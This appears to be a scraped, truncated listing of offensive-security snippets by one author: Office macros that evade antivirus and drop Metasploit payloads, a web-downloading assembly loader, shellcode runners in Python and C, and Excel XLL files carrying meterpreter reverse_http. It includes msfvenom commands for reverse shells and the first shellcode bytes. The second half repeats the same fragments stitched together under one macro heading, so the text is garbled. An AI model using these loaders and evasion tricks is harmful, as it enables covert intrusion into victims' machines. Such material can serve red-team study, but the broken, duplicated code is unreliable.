Arno0x

## loadAssembly_method1.ps1
$Source = @"
using System;
using System.Net;
using System.Reflection;
namespace LoadAssembly {
public static class LoadAssembly {
public static void load() {
WebClient webclient = new WebClient();
IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
if (defaultProxy != null) {

## officeEmbeddedFileDecode.vba
' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload
'
' This macro searches for a marker paragraph, namely "marker" in the example below
' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to
' a local file.
'
' Example, in the word document:
' marker
' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 ....

## macro_evade_av_01.vba
' Author Arno0x0x - https://twitter.com/Arno0x0x
'
' This macro downloads an XML bibliography source file.
' The <Title> element of this XML file actually contains a base64 encoded MSOffice template
' which itself contains another malicious macro much more detectable (meterpreter for instance).
'
' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder
' Only then, an new Office Word object is instantiated to load this Office Template and run a specific macro from it.
'
' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers

## formatConverter.py
#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#
import argparse

#======================================================================================================
#											HELPERS FUNCTIONS
#======================================================================================================

## mergeVBAPayload.vba
' Sometimes, after generating a metasploit payload with vba output format, you get a payload which is too long
' for the vba line continuation limit (24 line continuation max)
' So you have to split the payload in two arrays, then merge them again.
'
' This snippet shows the simple trick

Dim PayloadPart1, PayloadPart2, Final As Variant

PayloadPart1 =  Array ( whatever metasploit first part payload with line _
  continuation _

## shellcodeExecute.py
#!/usr/bin/python
# -*- coding: utf8 -*-
# This script executes a Windows shellcode within python process memory.
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#
# Create a windows executable: pyinstaller --onefile --noconsole sample4.py

from ctypes import *

## shellcodeExecute.c
// Compile with: cl.exe shellcode_execute.c
//
// Author: Arno0x0x, Twitter: @Arno0x0x

#include <Windows.h>

int main()
{
	// Payload obtained with "msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.52.134"
	unsigned char b[] =

## shellcode_ExcelRegisterXLL.c
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void);

DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
	// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
	unsigned char b[] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"

## shellcode_multibyteXOR_ExcelRegisterXLL.c
// Compile with:
//		cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
//		msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
//		./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor

#include <Windows.h>

## macro_evade_av.vba
#If VBA7 Then
    Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr
    Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr
#Else
    Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long
    Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long
#End If
	$Source = @"
	using System;
	using System.Net;
	using System.Reflection;
	namespace LoadAssembly {
	public static class LoadAssembly {
	public static void load() {
	WebClient webclient = new WebClient();
	IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
	if (defaultProxy != null) {
	' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload
	'
	' This macro searches for a marker paragraph, namely "marker" in the example below
	' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to
	' a local file.
	'
	' Example, in the word document:
	' marker
	' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 ....
	' Author Arno0x0x - https://twitter.com/Arno0x0x
	'
	' This macro downloads an XML bibliography source file.
	' The <Title> element of this XML file actually contains a base64 encoded MSOffice template
	' which itself contains another malicious macro much more detectable (meterpreter for instance).
	'
	' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder
	' Only then, an new Office Word object is instantiated to load this Office Template and run a specific macro from it.
	'
	' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers
	#!/usr/bin/python
	# -- coding: utf8 --
	#
	# Author: Arno0x0x, Twitter: @Arno0x0x
	#
	import argparse

	#======================================================================================================
	# HELPERS FUNCTIONS
	#======================================================================================================
	' Sometimes, after generating a metasploit payload with vba output format, you get a payload which is too long
	' for the vba line continuation limit (24 line continuation max)
	' So you have to split the payload in two arrays, then merge them again.
	'
	' This snippet shows the simple trick

	Dim PayloadPart1, PayloadPart2, Final As Variant

	PayloadPart1 = Array ( whatever metasploit first part payload with line _
	continuation _
	#!/usr/bin/python
	# -- coding: utf8 --
	# This script executes a Windows shellcode within python process memory.
	#
	# Author: Arno0x0x, Twitter: @Arno0x0x
	#
	# Create a windows executable: pyinstaller --onefile --noconsole sample4.py

	from ctypes import *
	// Compile with: cl.exe shellcode_execute.c
	//
	// Author: Arno0x0x, Twitter: @Arno0x0x

	#include <Windows.h>

	int main()
	{
	// Payload obtained with "msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.52.134"
	unsigned char b[] =
	// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
	#include <Windows.h>

	__declspec(dllexport) void __cdecl xlAutoOpen(void);

	DWORD WINAPI ThreadFunction(LPVOID lpParameter)
	{
	// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
	unsigned char b[] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
	// Compile with:
	// cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
	//
	// C/CPP code obtained like this:
	// 1. Get a raw meterpreter shellcode:
	// msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
	// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
	// ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor

	#include <Windows.h>
	#If VBA7 Then
	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr
	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr
	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr
	#Else
	Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long
	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long
	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long
	#End If